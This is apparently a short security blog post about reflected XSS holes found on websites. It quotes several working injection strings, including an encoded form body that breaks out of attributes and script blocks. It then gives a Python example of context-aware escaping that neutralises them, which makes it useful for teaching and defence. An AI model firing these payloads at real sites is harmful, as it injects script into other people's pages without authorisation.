Pack of xss

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately, even though XSS is old news in the security community and there are well-established techniques to mitigate the attack, it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

All XSS vectors displayed here were reported last weekend, and some may have been fixed.

;'><script>alert('zombies ahead!');</script><&ss=Business;<script>alert('ZOMBIES AHEAD');</script><;
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0;;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403;!%27)%3b%3c%2fscript%3e
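
The vectors above break out of a quoted attribute value ("> and '>) or out of an inline script block (</script><script>), and both are closed off by encoding for the context the value is written into. The following is an added example, not code from the original post or from any of the reported sites; the templates, the function names and the variable q are hypothetical, and the inputs are the POSTDATA line and the script-context fragment as quoted above.

```python
import html
import json
from urllib.parse import parse_qs, unquote

# Sample input taken from the vectors quoted in the post (no target URL involved).
POSTDATA = ("locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29"
            "%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0"
            "&numGuests=1&rating=0")
SCRIPT_FRAGMENT = "%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C"


def reflected_location(body: str) -> str:
    """Decode the form body the way a handler would and return the 'location' field."""
    return parse_qs(body, keep_blank_values=True)["location"][0]


def render_attr(value: str) -> str:
    """Reflect a value into a double-quoted HTML attribute (hypothetical template)."""
    # quote=True also encodes " and ', so the value cannot close the attribute.
    return '<input name="location" value="%s">' % html.escape(value, quote=True)


def js_literal(value: str) -> str:
    """Encode a value as a JS string literal that is safe inside an inline <script>."""
    literal = json.dumps(value)  # quotes the string, escapes ", \ and control characters
    # The HTML parser ends a script block at a literal </script>, even inside a JS
    # string, so <, > and & are written as \uXXXX escapes instead.
    for ch in "<>&":
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal


def render_js(value: str) -> str:
    """Reflect a value into an inline script block (hypothetical template)."""
    return "<script>var q = %s;</script>" % js_literal(value)


if __name__ == "__main__":
    loc = reflected_location(POSTDATA)
    print("decoded field :", loc)
    print("attribute ctx :", render_attr(loc))
    print("script ctx    :", render_js(unquote(SCRIPT_FRAGMENT)))
```
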

This weblog is licensed under a Creative Commons License.